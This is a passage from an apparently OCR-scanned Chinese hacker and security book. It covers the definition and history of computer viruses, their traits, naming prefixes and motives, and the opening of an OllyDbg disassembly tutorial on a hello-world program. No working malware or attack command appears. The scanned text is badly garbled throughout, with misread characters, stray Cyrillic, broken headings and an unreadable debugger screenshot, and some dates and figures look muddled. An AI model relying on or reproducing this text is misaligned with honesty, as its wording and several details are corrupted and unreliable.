对 不 是 只 会 拿 着 工具 的 “脚本 小 子 ”， 无 论 是 web、 应 用 、 移 动 或 者 其 他 ， 都 需要 静心 学 
习 。 心 浮 气 躁 只 能 浪费 目 己 的 时 间 ， 很 多 前 幸 们 都 经 历 过 弯路 ， 多 跟 技术 大 牛 交 流 可 以 事 
半 功 倍 ， 少 走 弯 路 。 第 三 ， 是 要 保持 兴趣 。 兴 趣 永远 是 最 好 的 老师 ， 保 持 对 事物 的 兴趣 可 
以 让 目 己 坚持 ， 坚 持 ， 再 坚持 。 
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АА 黑客 与 安全 技术 指南 


关于 病毒 的 研究 和 基于 病毒 的 攻防 技术 ， 在 计算 机 领域 非常 重要 。 本 章 是 一 个 “大 ” 
章节 ， 内 容 较 多 ， 看 上 去 较 难 ， 建 议 读者 勤 做 笔记 ， 跟 看 笔者 一 起 实践 、 分 析 ， 一 定 会 发 
现 病毒 的 魅力 。 
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911 计算 机 病毒 的 定义 


计算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 
啊 计 算 机 使 用 ， 并 能 目 我 复制 的 一 组 计算 机 指令 或 者 程序 代码 〈 摘 目 《 中 华人 民 共 和 国 计 
算 机 信息 系统 安全 保护 条 例 》 第 二 十 八条 ) 。 

计算 机 病毒 是 一 个 程序 或 一 段 可 执行 代码 ， 就 像 生物 病 毒 一 样 具有 目 我 驼 殖 、 互 相传 
染 以 及 激活 再 生 等 生物 病毒 特征 。 计 算 机 病毒 有 独特 的 复制 能 力 ， 它 们 能 够 快速 芝 延 ， 叉 
妾 弟 难 以 根除 。 计 算 机 病毒 能 把 目 喘 附 看 在 各 种 类 型 的 文件 上 ， 当 文件 被 复制 或 从 一 个 用 
户 传送 到 夯 一 个 用 户 时 ， 它 们 融 随 同文 件 一 起 蔓延 开 来 。 

实际 上 ， 计 算 机 病毒 就 是 人 类 通过 研究 病毒 仿生 学 ， 作 用 于 计算 机 ， 通 过 计算 机 指令 或 
者 程序 代码 ， 破 坏 计 算 机 系统 从 而 获得 对 病毒 制造 者 来 说 有 件 利 价值 的 信息 的 工具 手段 。 

综 上 所 述 ， 计 算 机 病毒 并 不 神秘 ， 因 为 它 只 是 一 段 计算 机 指令 或 者 程序 代码 ， 也 就 是 
说 只 要 读者 学 过 一 门 计算 机 语言 ， 就 拥有 编写 计算 机 病毒 的 语言 基础 ， 但 是 没有 编号 病毒 
的 能 力 ， 因 为 对 计算 机 病毒 的 逻辑 原理 、 运 行规 则 没有 一 定 的 认 知 。 本 章 将 详细 讲述 计算 
机 病毒 的 原理 、 行 为 以 及 对 计算 机 病毒 的 防范 ， 从 源码 上 探秘 ， 从 行为 上 分 析 计 算 机 病毒 
是 如 何 制造 并 投入 运行 ， 进 而 使 读者 从 中 获得 对 于 病毒 防范 手段 的 局 发 ， 并 激发 读者 对 于 
软件 安全 的 兴趣 与 热情 。 


9.1.2 计算 机 病毒 的 起 源 与 发 展 


谈 及 计算 机 病毒 的 起 源 ， 不 得 不 提 及 享有 伟大 数学 家 、 现 代 计 算 机 创始 人 名 党 的 
АТ Пеи Не (John von Neumann) ， 他 在 1945 年 提交 了 改进 ENIAC (Electronic 
Numerical Integrator And Calculator) 设计 方案 ， 引 入 了 运算 器 、 迎 辑 控制 装置 、 存 储 器 、 
输入 和 输出 设备 的 概念 ， 并 且 于 1949 年 发 表 的 一 篇 学 术 论 文 《 目 我 党 衍 的 目 动 机 理论 》 

(Theory of Self-Reproducing Automata) 中 提出 计算 机 程序 能 够 在 内 存 中 进行 目 我 复制 ， 
这 就 为 计算 机 病毒 的 控制 设备 以 及 在 内 存 中 运行 、 复 制 艳 定 了 坚实 的 理论 基础 。 

在 1960 年 初 ， 贝 尔 实验 室 的 三 个 年 轻 程序 员 用 汇编 语言 玩 起 了 一 个 游戏 ， 也 就 是 著名 
HJ “WAS ҖАЙ” 运用 汇编 语言 编写 的 破坏 对 手 的 程序 ， 表 现 出 了 病毒 的 感染 性 ， 也 体 
现 出 计算 机 病毒 概念 的 秩 形 。 

1977 年 托马斯 。 捷 。 瑞 安 (Thomas.JRyan) 的 科幻 小 说 《P-1 的 春天 》 (The 
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жон 病毒 不 神秘 人 Mh 


Adolescence of P-1) ， 摘 绘 出 病毒 在 计算 机 中 相互 感染 并 最 终 控 制 了 7000 台 计算 机 的 灾难 
情节 ， 并 且 把 这 种 病毒 第 一 次 称 为 “计算 机 病毒 ”。 

1983 年 11 月 3 日 ， 美 国 南 加 州 大 学 的 学 生 弗 雷 德 。 科 恩 (Fred Cohen) ， 后 来 被 誉 为 
“ 计 鼻 机 病毒 之 父 ”， 于 VAX11/750 计 算 机 系统 ， 也 融 是 UNIX 系 统 下 编写 并 运行 了 一 个 
具有 目 我 复制 功能 ， 可 在 计算 机 间 传 染 令 操 作 系 统 死 机 的 程序 。 他 紧 接着 于 一 周 后 义 进行 
了 5 次 实验 ， 得 出 了 计算 机 病毒 确实 存在 的 结论 。 他 的 导师 伦 ， 艾 德 勒 曼 (Len Adleman) 
将 它 命 名 为 计算 机 病毒 。 科 恩 通 过 不 懈 地 研究 与 思考 ， 于 1987 年 发 表 了 一 篇 表 动 世界 的 博 
士 论 文 《计算 机 病毒 》， 该 论文 第 一 次 从 真正 意义 上 提出 了 计算 机 病毒 的 概念 。 

1986 年 ， 巴 基 斯 坦 擅长 软件 编写 的 两 兄弟 为 了 打击 盗版 软件 的 使 用 者 ， 编 写 了 世界 上 
最 早 在 个 人 计算 机 上 广泛 传播 的 病毒 巴基斯坦 病毒 (C-Brain) ， 也 是 世界 上 第 一 例 
具有 真正 意义 的 计算 机 病毒 。 该 病毒 运行 于 DOS 系 统 下 ， 功 能 是 当 用 户 非法 拷贝 软件 时 ， 
“ 吃 掉 ”用 户 人 硬盘 的 剩余 空间 。 

1987 人 至 1989 年 ， 针 对 DOS 系 统 的 病毒 (黑色 星期 五 、IBM 圣 诞 树 等 ) 在 世界 范围 内 
流行 ， 我 国 也 出 现 了 能 够 感染 人 硬盘 和 软盘 引导 区 的 stoned 病 毒 ， 该 病毒 体 代码 中 有 明显 的 标 
志 一 一 Your РС is now Stoned! LEGALISE MARIJUANA! ， 该 病毒 也 称 为 “大 麻 病 毒 ”。 

20 世 纪 90 年 代 ， 随 着 Windows 系 统 的 普及 ，Windows 系 统 下 的 病毒 也 是 愈 来 愈 多 ， 其 
中 著名 的 有 1996 年 的 宏 病毒 和 1998 年 的 CIH 病 毒 。 

宏 病 毒 主要 感染 对 象 为 微软 公司 的 Office 办 公 软 件 ， 如 Word、Excel 等 ， 一 旦 打开 感染 
了 宏 病 毒 的 文档 ， 其 中 具有 病毒 感染 效应 的 宏 就 会 被 执行 ， 宏 病毒 就 会 转移 到 计算 机 中 ， 
寄生 在 Normal 模 板 上 ， 并 且 会 带 有 恶意 地 阻止 用 户 正 常 使 用 Office 软 件 ， 该 病毒 主要 借助 
存在 于 Internet 上 的 文档 进行 传播 。 

CIH 病 毒 的 危害 更 加 巨大 ， 它 对 于 Windows 95/98 系 统 拥 有 毁灭 性 的 破坏 力 。CIH 病 毒 
针对 Win32 系 统 ， 感 染 EXE 文 件 ， 属 于 文件 型 病毒 ， 于 每 年 的 4 月 26 日 (CIH V1.2). 6H 
26H (CIH V1.3) 、 每 月 的 26 日 (СН V1.4) 运行 发 作 ， 它 将 破坏 硬盘 数据 ， 同 时 会 对 某 
些 主板 上 的 Flash Rom 中 的 BIOS 进 行 破坏 ， 使 物理 人 硬盘 损坏 或 主板 损坏 ， 最 终 导 致 计算 机 
无 法 正常 启动 ， 运 行 。 

就 在 1998 年 克 ，Happy99 网 络 蠕虫 病毒 一 一 完全 通过 Interet 传 播 的 病毒 诞生 。 该 病毒 
通过 邮件 传播 ， 病 毒 运行 后 ， 屏 幕 上 出 现 绚 丽 烟花 效果 ， 并 显示 Happy New Year 1999!! НУ 
标题 ， 以 庆祝 1999 年 的 到 来 ， 并 于 后 台 悄 悄 运 行 ， 干 扰 邮 件 的 正常 收发 。 

随后 在 1999 年 3 月 ， 梅 丽 莎 病毒 (Melissa， 创 作 于 1998 年 春天 ， 最 早 可 以 通过 邮件 传 
播 的 病毒 ) 爆发 ， 这 是 世界 上 第 一 例 以 邮件 方式 进行 传播 的 病毒 。 邮 件 收 件 人 会 收 到 标 
题 主要 为 Important Message From ххх 〈xxx 为 用 户 名 ) , 2) Неге is Ша document you 
asked Гог... don't show anyone else; -) 的 邮件 ,一旦 收 件 人 打开 邮件 ， 潜 伏 在 文档 中 的 
宏 病 毒 梅 丽 莎 就 会 发 作 ， 自 动向 用 户 通讯 录 的 前 50 位 好 友 复 制 发 送 携带 病毒 文档 的 
邮件 。 

2000 年 2 月 ， 一 种 名 为 分 布 式 拒绝 服务 攻击 (DDOS) 的 攻击 方式 大 规模 爆发 ， 先 后 
使 Yahoo、 亚 马 还 、CNN 等 网 站 朋 演 瘫痪 。 同 年 名 为 “ 爱 虫 ” (Love letter) 的 由 VBS 脚 本 
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语言 编写 的 病毒 通过 邮件 大 肆 传 播 ， 病 毒 以 邮件 传播 的 方式 又 达到 一 个 新 的 高 度 。 相 比 于 
梅 丽 莎 病毒 而 言 ， 其 破坏 性 更 大 ， 该 病毒 在 利用 微软 的 Outlook 软 件 传 播 病毒 的 同时 ， 还 
可 以 利用 ActiveX 控 件 对 计算 机 用 户 的 本 地 人 硬盘 文件 进行 读 写 操作 。 

2001 年 ， 蠕 虫 “ 红 色 代 码 ” 与 “ 尼 达 姆 ”相继 爆发 ， 前 者 被 称 为 最 帅 贵 的 病毒 之 一 ， 
因 其 利用 微软 Microsoft IIS Web 服 务 器 的 漏洞 (0day) 对 计算 机 进行 攻击 ， 并 且 取 得 计算 
机 的 最 高 权限 。 尼 达 姆 病毒 不 仅 利用 漏洞 还 主要 以 邮件 形式 进行 传播 ， 入 侵 了 约 830 万 台 
计算 机 ， 造 成 经 济 损失 高 达 5.3 亿 美元 ， 给 缺乏 邮件 信息 安全 意识 的 计算 机 用 户 们 上 了 生 
动 的 一 课 ， 网 络 蠕虫 引发 的 安全 问题 自 此 得 到 了 人 们 的 重视 。 同 时 ， 国 内 知名 远程 控制 软 
件 “ 灰 饮 子 ”被 制作 了 出 来 ， 谁 也 没有 想到 ， 原 本 用 于 家 庭 公司 的 正常 监控 软件 会 在 4 年 
后 成 为 卷 席 中 国 互联 网 安全 界 的 罪魁 祸首 。 

2003 年 ， 冲 击 波 病 毒 (Blaster) 席卷 全 球 ， 它 利用 RPC 漏 洞 攻 击 TCP135 号 端口 ， 获 得 
操作 系统 的 最 高 权限 ， 进 而 控制 笨 主 机 ， 对 其 隐私 进行 非法 窃取 。 据 计算 机 系统 安全 及 服 
АНГ], (Symantec) 安全 反应 感应 器 网 络 的 样本 显示 ， 全 球 至 少 有 12.4 万 台 使 用 
微软 窗口 软件 的 计算 机 遭受 感染 。 计 算 机 防毒 软件 厂商 “趋势 科技 ” (TrendMicro) 的 专 
家 说 ，“ 冲 击 波 ” 病 毒 可 能 感染 了 全 球 一 两 亿 台 计算 机 。 

2004 年 ， 同 样 是 利用 漏洞 进行 攻击 传播 的 震荡 波 〈Sasser) 病毒 肆虐 互联 网 ， 利 用 
Lsass 漏 洞 进行 传播 ， 开 启 中 招 用 户 计算 机 的 128 个 线程 去 攻击 其 他 计算 机 用 户 ， 同 样 造成 
了 巨大 的 经 济 损失 。 也 是 在 这 一 年 内 ， 第 一 例 基于 手机 塞 班 系统 的 蠕虫 病毒 面世 ， 这 就 是 
Cabir 蠕 虫 病毒 ， 这 种 病毒 攻击 对 象 为 诺基亚 S60 系列 、Symbian 操作 系统 的 手机 ， 并 且 利 
用 蓝牙 漏洞 进行 传播 ， 自 此 手机 病毒 也 走 进 人们 的 视野 。 

2005 年 ， 各 类 病毒 层出不穷 。 据 金山 反 病 毒 监 测 中心 数 据 显 示 ， 从 2005 年 1 月 到 10 
月 ， 一 共 截 获 或 监测 到 的 病毒 达到 50 179 个 ， 其 中 木马 、 蠕 虫 、 黑 客 病毒 占 其 中 的 91%， 
以 盗 取 用 户 有 价 账 号 〈 如 网 银 、QQ、 网 游 ) 的 木马 病毒 为 主 ， 多 达 2000 多 种 ， 如 果 算 上 
变种 则 就 要 超过 一 万 种 ， 平 均 每 天 有 30 个 病毒 出 现 。 远 程控 制 软 件 “ 灰 鸟 子 ” (Win32. 
Hack.Huigezi) 被 各 大 杀毒 软件 列 为 年 度 十 大 病毒 之 一 ，“ 灰 鸽子 ”名 声 大 品 。 庞 大 的 数 
据 也 明确 地 表明 计算 机 病毒 进入 了 一 个 快速 增长 的 爆发 期 。 

2006 年 11 月 ， 感 染 能 力 与 破坏 能 力 极 强 的 “熊猫 烧香 ”病毒 深 深 地 印 入 了 每 一 位 计算 
机 用 户 的 心中 。 熊 猫 烧香 本 质 是 一 个 经 过 多 次 变种 的 蠕虫 病毒 ， 感 染 能 力 极 强 ， 用 户 系统 
正常 的 文件 几乎 都 会 遭 到 病毒 感染 ， 而 用 户 系 统 中 所 有 .exe 可 执行 文件 的 图 标 都 会 被 算 改 
成 举 着 三 根 香 的 大 熊猫， 这 也 是 熊猫 烧香 病毒 名 称 的 来 源 。 它 也 会 通过 网 站 /局 域 网 来 传 
播 ， 因 此 熊猫 烧香 病毒 的 传播 速度 极 快 ， 在 短 短 几 个 小 时 内 就 有 几 王 台 计 算 机 感染 该 病 
毒 。 虽 然 它 经 过 多 次 变种 ， 但 熊猫 烧香 病毒 的 破坏 能 力也 不 可 忽视 ， 计 算 机 用 户 的 信息 会 
遭 到 窃取 ， 硬 盘 数 据 也 会 遭受 到 破坏 ， 病 毒 会 删除 拓展 名 gho 的 文件 ， 使 得 ghost 软件 无 法 
恢复 操作 系统 ， 同 样 还 会 杀 掉 各 类 杀毒 软件 的 进程 与 线程 ， 致 使 杀毒 软件 无 效 ， 可 谓 危 害 
极 大 。2012 年 1 月 ， 伴 随 着 新 年 的 来 临 ， 能 猎人 烧香 的 变种 病毒 金 猪 报喜 现 喘 于 互联 网 ， 它 
和 熊猫 烧香 病毒 不 同 的 是 ， 金 猪 报喜 病毒 将 文件 图 标 变 成 “ 金 猪 报喜 ”， 借 春节 来 临 人 们 
相互 祝贺 的 时 机 大 肆 传 播 。 由 于 其 具有 熊猫 烧香 的 本 质 ， 故 熊猫 烧香 病毒 专 杀 工 具 就 可 以 
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清除 该 病毒 的 威胁 ， 因 此 没有 造成 巨大 经 济 损失 。 

2007 年 ， 据 瑞星 反 病 毒 监 测 网 数据 统计 ， 珊 星 公 司 共 截获 新 病毒 样本 917 839 个 ， 比 
去 年 增加 了 70.7%。 其 中 木马 病毒 580 992 个 ， 后 门 病毒 194 581 个 ， 两 者 之 和 超过 77 万 
个 ， 占 总 体 病 毒 的 84.$%。 其 中 利用 U 盘 等 移动 存储 设备 进行 传播 的 病毒 泛滥 ， 以 帕 虫 
(AV 终 结 者 ，AV is anti-virus) 病毒 、 大 小 姐 病毒 为 代表 ， 这 些 病毒 的 主要 目的 是 入 侵 系 
统 ， 破 坏 杀 毒 软件 正常 运行 与 盗 取 网 游 、 网 银 等 账号 ， 从 中 牟取 非法 利益 。 

2008 年 ， 病 毒 传 播 方 式 的 重点 从 移动 存储 设备 转移 到 了 “网 页 挂 马 ” 的 形式 ， 用 户 
通过 浏览 被 上 传 了 病毒 的 网 页 ， 或 者 下 载 了 含有 病毒 的 文件 从 而 感染 病毒 ， 因 广大 计算 机 
用 户 缺 乏 网 络 安 全 的 防范 意识 ， 以 及 杀毒 软件 对 于 含有 病毒 网 页 的 检查 程度 不 够 而 导致 用 
户 中 招 的 比例 大 大 增加 。 这 也 正 警 告 着 维护 网 页 平台 的 安全 人 员 应 及 时 地 填补 网 页 中 的 漏 
洞 ， 计 算 机 用 户 对 于 网 络 安 全 的 认识 也 吸 待 提高 。 

2009 年 ，“ 网 页 挂 马 ”与 钓鱼 网 站 激增 ， 这 种 成 本 低 、 收 入 颇 高 的 黑色 产业 链 日 渐 
成 型 ， 其 中 钓鱼 网 站 主要 以 各 大 网 络 公司 活 动 为 诈骗 诱饵 ， 如 腾讯 QB 充值 、 网 易 点 卡 充 
值 ， 以 及 以 福利 彩票 、 电 视 节 目 中 奖 信息 等 ， 吸 引用 户 填写 个 人 账户 等 信息 ， 从 而 骗取 用 
户 的 合法 财产 。 随 着 网 络 游 戏 产业 的 日 益 兴 旺 ， 基 于 网 络 游戏 制作 的 外 挂 软件 也 纷纷 投入 
市 场 ， 这 些 软 件 往往 捆绑 着 木马 病毒 ， 在 用 户 运 行 外 挂 软件 非法 盘 利 的 同时 ， 用 户 本 身 的 
利益 也 受到 了 木马 编写 者 的 侵害 ， 可 谓 是 星 螂 捕 蝉 黄 汰 在 后 。 第 一 例 基 于 手机 系统 的 木马 
病毒 (间谍 软件 ，Mobile өру) 已 经 渗透 到 世界 各 地 手机 用 户 的 手机 中 ， 相 比 形 形 色色 的 
计算 机 病毒 而 言 ，Mobile spy 无 疑 是 更 加 可 怕 ， 首 先 该 软件 在 当时 几乎 可 以 寄生 、 隐 藏 在 
任意 一 部 手机 中 ， 其 次 就 是 它 强大 的 功能 一 一 拍照 、 录 像 、 录 音 、 定 位 、 短 信和 监控 等 。 由 
于 手机 安全 领域 的 空白 ， 使 得 由 此 间谍 软件 带 来 的 损失 无 法 估计 ， 这 也 警示 着 开拓 手机 安 
全 领域 、 研 制 保护 手机 的 安全 软件 的 任务 刻不容缓 ! 

2010 年 ， 用 户 感染 计算 机 病毒 的 比例 为 60%， 相 比 前 一 年 的 70.51% 有 所 下 降 ， 形 成 
下 降 趋势 的 局 面 ， 一 方面 得 益 于 反 病 毒 技 术 的 逐步 完善 ， 男 一 方面 得 益 于 对 计算 机 用 户 
防治 病毒 知识 的 普及 。 而 病毒 的 攻击 针对 的 目标 也 转移 至 网 银 、 网 购 等 用 户 ， 实 行 专用 
户 针对 性 攻击 。 然 而 Web 网 站 安全 形势 依旧 严峻 ， 新 的 0day 不 断 被 挖掘 出 ， 网 站 维护 人 员 
修补 漏洞 不 及 时 ， 使 得 很 多 网 站 依旧 能 被 轻而易举 地 入 侵 、 挂 马 ， 当 用 户 访问 页 面 的 时 
候 ， 病 毒 会 利用 用 户 系 统 内 的 漏洞 完成 入 侵 。 一 种 新 的 攻击 模式 APT 攻 击 借 “ 震 网 病毒 ” 
(Stuxnet) 震惊 全 球 ，APT (Advanced Persistent Threat) ， 即 长 时 间 可 间断 攻击 ， 具 有 强 
烈 的 针对 性 ， 通 常 带 有 浓烈 的 政治 、 利 益 色彩 。“ 震 网 病毒 ”由 美国 及 以 色 列 情报 部 门 
开发 ， 针 对 全 球 各 大 能 源 工 进行 攻击 的 病毒 ， 该 病毒 也 可 以 说 是 信息 化 战场 第 一 例 投入 应 
用 的 病毒 ， 其 中 伊 妆 受 其 影响 最 为 严重 。 在 一 次 攻击 中 ， 伊 明 的 纳 坦 效 铀 浓缩 基地 至 少 有 
1 的 离心 机 因 感 染 该 病毒 而 被 迫 关 闭 。 

果不其然 ， 由 于 Web 安 全 并 没有 得 到 足够 的 重视 ， 在 接 下 来 的 两 年 内 网 购 木马 出 现 了 
爆发 式 的 增长 。 网 购 木 马 在 后 台 悄 悄 运 行 并 且 监 控 计算 机 用 户 ， 当 计算 机 用 户 通 过 网 购 平 
台 交 易 时 ， 木 马 进 行 交易 劫持 ， 也 就 是 当前 的 交易 页 面 会 偷偷 被 病毒 跳 转 到 指定 网 址 或 者 
修改 后 台 账 户 指 癌 黑客 账户 ， 当 然 先 前 的 交易 也 就 神 不 知 鬼 不 觉 地 被 取消 了 ， 其 中 “ 文 
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付 大 盗 ”“ 浮 云 ” 与 “刺客 ”最 有 代表 性 。2012 年 的 “ 毒 王 ”依旧 是 基于 Windows 操 作 系 统 
平台 的 “ 鬼 影 ”系列 病毒 ，“ 鬼 影 ” 具 有 的 “小 强 ” 特 性 使 它 位 列 榜首 。“ 鬼 影 ” 有 极 强 
的 生存 能 力 ， 它 能 捆绑 下 载 AV 终 结 者 等 针对 杀毒 软件 的 病毒 程序 ， 并 且 将 主 代码 寄存 在 
MBR (人 硬盘 主 引 导 记 录 ) 中 。 这 样 ， 就 算是 重 装 了 系统 ， 病 毒 依然 会 运行 生效 。 同 样 ， 
由 于 安 早 系统 开源 的 特性 ， 安 旱 病 毒 有 成 指数 函数 增长 的 趋势 ， 恶 意 扣 费 和 信息 泄露 是 
病毒 主要 的 两 大 功能 ， 并 且 于 2012 年 出 现 寄 生 于 微 信 等 平台 的 僵尸 程序 (手机 僵尸 病 
毒 ， 通 过 向 其 他 人 目 动 发 送 含 有 病毒 链接 的 短信 、 消 奶 进 行 传播 ) ， 手 机 安全 形势 不 容 
乐观 。 

从 2013 到 2015 年 ， 病 毒 的 主要 进攻 方 癌 已 经 明朗， 第 一 是 移动 终端 ， 第 二 则 是 网 络 
支付 服务 。 目 前 在 移动 终端 中 ， 由 于 安里 系统 的 开源 性 以 及 大 部 分 APP 没 有 进行 严格 地 审 
核 ， 导 致 病毒 大 肆 发 展 与 传播 ， 并 且 随 着 二 维 码 、 微 信 支 付 等 方式 的 产生 ， 利 用 扫 码 、 支 
付 等 漏洞 的 病毒 正 源源 不 断 地 被 开发 出 来 。 同 样 ，iOS 用 户 也 绝 不 能 掉以轻心 ， 虽 然 APP 
在 App Store 中 需要 经 过 严格 审核 ， 但 是 2014 年 11 月 ， 一 个 名 为 WireLurker 的 病毒 感染 了 约 
35 万 的 中 国人 苹果 用 户 。 该 病毒 通过 寄生 在 第 三 方 软件 商店 “麦芽 地 ”中 ， 当 用 户 在 Mac/ 
PC 平台 使 用 “麦芽 地 ”通过 USB 连 接 1O0S 设 备 下 载 盗版 软件 时 ， 病 毒 就 会 顺 着 这 条 数据 
线 ， 从 计算 机 入 侵 到 移动 设备 中 ， 并 且 目 动 下 载 恶 意 软 件 ， 无 论 是 否 越狱 。 当 然 ， 广 大 
10S 用 户 不 必 因 此 害怕 ， 但 却 要 因此 而 警惕 起 来 ， 不 要 贪图 便宜 而 去 下 载 危 险 未 知 的 第 三 
方 盗版 软件 ， 也 不 要 去 轻易 越狱 ,病毒 总 是 潜藏 在 未 知 中 。 不 容 置 疑 ， 在 网 络 交 易 平 台所 
带 来 有 巨大 利益 的 这 块 大 和 蛋糕 的 趋势 下 ， 被 金钱 蒙 项 了 双眼 的 黑客 也 许 正 酝酿 着 给 予 互 联 
网 交易 一 个 巨大 的 冲击 。 毫 无 疑问 ， 未 来 物 联网 将 成 为 新 时 代 的 主流 科技 ， 而 伴随 着 物 联 
网 的 逐渐 发 展 ， 黑 客 隐患 更 加 不 能 被 忽视 ， 也 许 在 将 来 的 物 联 网 时 代 ， 科 幻 游戏 《看 门 
狗 》 中 的 病毒 程序 就 会 成 为 现实 。 


9.1.3 ”计算 机 病毒 的 特点 、 分 类 与 目的 


1. 计算 机 病毒 的 特点 


通过 上 面 一 节 计算 机 病毒 的 发 展 史 ， 我 们 可 以 从 中 总 结 出 计算 机 病毒 的 特性 。 

(1) 传染 性 

计算 机 病毒 就 如 同 生 物 病毒 一 般 ， 既 可 以 在 计算 机 系统 内 进行 文件 之 间 的 传染 ， 又 可 
以 在 计算 机 与 计算 机 之 间 传 染 。 传 染 的 媒介 可 以 是 物理 硬件 ， 如 U 盘 、 移 动 硬盘 等 移动 存 
储 设 备 ， 也 可 以 是 通过 虚拟 网 络 传输 文件 、 邮 件 等 方式 进行 传染 。 

(2) 破坏 性 

通常 来 说 ， 计 算 机 病毒 几乎 都 带 有 一 定 的 对 计算 机 系统 、 程 序 、 硬 件 的 破坏 能 力 。 破 
坏 能 力主 要 体现 在 算 改 目标 文件 、 破 坏 系统 程序 、 盗 取 账 号 密码 等 方面 。 病 毒 的 威胁 能 力 
并 不 取决 于 病毒 的 破坏 性 ， 而 是 决定 于 病毒 的 隐蔽 性 。 
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(3) 隐蔽 性 

病毒 的 隐蔽 性 是 决定 其 能 和 否 长 久 存活 并 且 发 挥 作 用 的 决定 性 因素 。 病 毒 的 隐蔽 性 体现 
Е: 中 对 于 计算 机 用 户 而 言 ， 病 毒 能 够 神 不 知 鬼 不 觉 地 在 后 台 悄 悄 运 行 ， 并 且 一 般 不 会 做 
出 影响 计算 机 正常 运行 的 行为 ， 能 够 很 好 地 隐藏 而 不 被 计算 机 用 户 发 现 ; @ 对 计算 机 杀毒 
软件 而 言 ， 病 毒 通过 加 壳 免 杀 等 方式 绕 过 杀毒 软件 的 主动 防御 以 及 手动 查 杀 。 一 旦 病毒 做 
到 了 这 两 点 ， 那 么 这 个 病毒 的 隐蔽 性 就 是 极 好 的 ， 同 时 威胁 性 也 是 极 大 的 。 

(4) 潜伏 性 

病毒 的 潜伏 性 则 是 指 当 病毒 寄生 在 宿主 机 内 并 不 会 立刻 发 作 ， 而 是 当 通 过 用 户 或 应 用 
程序 触发 某 种 特定 的 条 件 时 ， 病 毒 才 会 运行 。 

(5) 潜在 性 

计算 机 病毒 会 随 着 科技 的 发 展 而 发 展 ， 伴 随 着 新 兴 应 用 的 产生 而 产生 ， 因 此 计算 机 病 
毒 对 于 任何 一 个 科技 、 应 用 来 说 ， 都 会 有 潜在 的 风险 ， 只 要 有 黑客 想 要 获得 某 种 利益 ， 那 
么 具有 针对 性 的 病毒 便 会 被 研发 出 来 ， 所 以 病毒 具有 潜在 性 。 


2. 计算 机 病毒 的 常见 类 型 


目前 第 见 的 计算 机 病毒 主要 有 以 下 几 种 类 型 。 
> Ми ИНН PE 名 称 ， 称 作 Windows 系 统 病 毒 ， 以 感染 .exe 和 .dll 文 件 


也 就 是 常见 的 木马 病毒 ， 通 种 会 盗 取 用 户 的 个 人 信息 

条 组 中 带 有 Hack， 黑 客 病 毒 ， 功 能 以 远程 控制 为 主 。 

条 组 中 带 有 Marco， 宏 病毒 ， 感 染 OfBce 文 件 。 

1728 1 aA Backdoor, 5 1152, ійі ТСРЛЈррРиЧХ, 4#) СМре А-4 AE 4. 
Я 

ТЕРІ 
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中 带 有 Harm， 破 坏 病毒 ， 对 计算 机 系统 及 文件 进行 破坏 ， 如 格式 化 硬盘 。 

中 带 有 joke， 玩 笑 病 毒 ， 主 要 以 恶搞 为 主 。 

”前 组 中 带 有 Binder， 捆 绑 病 毒 ， 捆 绑 在 其 他 正常 文件 上 ， 比 如 捆绑 QQ.exe, 则 为 
BinderQQ.exe。 


. 计算 机 病毒 的 目的 


展示 技术 能 力 ， 如 熊猫 烧 香 ，“Xxx 神 器 ”。 
出 于 利益 目的 ， 如 APT 攻 击 ， 木 蕊 病毒 。 
用 于 军事 ， 如 1999 年 科索沃 战争 ， 南 联盟 使 用 包括 计算 机 病毒 等 手段 实施 网 络 攻 
击 北约 军事 情报 网 络 ， 在 一 定 程度 上 延缓 了 美国 和 北约 其 他 国家 对 南 联盟 的 空袭 
进程 。 

了 解 了 计算 机 病毒 的 发 展 起 源 与 分 类 ， 那 么 到 底 什 么 是 计算 机 病毒 ? 接 下 来 通过 实例 
分 析 ， 来 深入 了 解 病毒 的 原理 。 


v wv со 
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92 ”常用 工具 及 病毒 分 析 


9.2.1 OD 进 阶 


在 上 一 章 介绍 逆 癌 技术 时 ， 讲 述 了 OD 的 基本 使 用 方法 以 及 在 软件 漏洞 分 析 中 的 作 
用 。 接 下 来 的 一 节 中 ， 将 会 使 用 OD 对 “ 敲 竹 杠 ”病毒 进行 详细 分 析 ， 并 且 将 在 分 析 的 同 
时 教会 大 家 如 何 去 更 多 地 了 解 OD， 明 白 如 何 去 合 理 、 高 效 地 使 用 与 分 析 。 
首先 来 看 一 小 段 代码 : 


#include "stdafx.h" 

int main(int argc, char* агду[]) { 
printf ("Hello,world!\n"); 

return 0; 


} 


上 述 代码 中 只 执行 了 两 条 命令 : printft、retum， 用 于 实现 打印 输出 和 返回 。 
下 面 逐 条 解释 反 汇 编 代 码 的 各 个 命令 。 
首先 载 入 OD。 图 9-1 显 示 了 各 个 界面 窗口 。 


ва «ка 


гах 00000000 
ECX 09122280 
EDX 7692ЕЩЕН ntdll.KiFast$S 


“ТҮТТҮ push овновова 
. 68 98264000 push 00402688 sE 处 理 程序 安装 
. 68:01 0000001 nou eax, dword ptr fs:[0] 


. 50 push eax 

. 68:8925 0000! поч дмогй ptr fs:[0], esp 

= BIEC 10 sud esp, 10 反 汇 编 窗 口 
. 52 push ebx 

21. 56 push esi 


ЕРІ 7C930208 ntd11.7C9302 
EIP 00581041 дг. Г] 
CO ES В D(FFFFFFB 


1 

0 

1 DS 
@ FS 9038 324) 7FFDF000 
u 


P 
ñ 
2 
$ 
l GS 0000 NULL 


7C930208 ntd11l.7C930209 


0071 

0012FFCC|_ ҒҒҒҒҒҒҒҒ 

00127700] 77706000 个 
0127 ЕОЩ| 80545870 

00127708 0012FFC8 

ФО12ЕЕОС | 81048020 

90127 РЕФ] FFFFFFFF|SEH БЕ 栈 窗 口 
ФО12Е РЕЖ 7сязеаст ЗЕ T 


9-1 OD 界面 窗口 
在 每 个 窗口 右 击 可 得 到 对 应 窗口 的 沫 单 。 
在 一 个 程序 被 载 入 OD 进 行动 态 反 汇编 的 时 候 ， 首 要 的 一 点 就 是 找到 入 口 点 ， 不 同 IDE 
编译 出 的 程序 的 入 口 点 会 有 所 不 同 ， 这 个 就 需要 读者 目 己 观察 ， 或 者 百度 搜索 一 下 入 口 点 
特征 。 
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VC 6.0 编 译 出 的 程序 ， 入 口 点 是 三 个 压 栈 指令 push， 这 个 虽然 在 int main(int argc, char* 
argv[]) 定义 的 时 候 没 有 写 ， 但 是 执行 的 时 候 默 认 还 是 传递 3 个 参数 ， 如 图 9-2 所 示 。 


. 50 

. ҒҒЗ5 2099400 
. FF35 1099500 
- E8 9BFFFFFF 


004 01 ӨЕЗ 
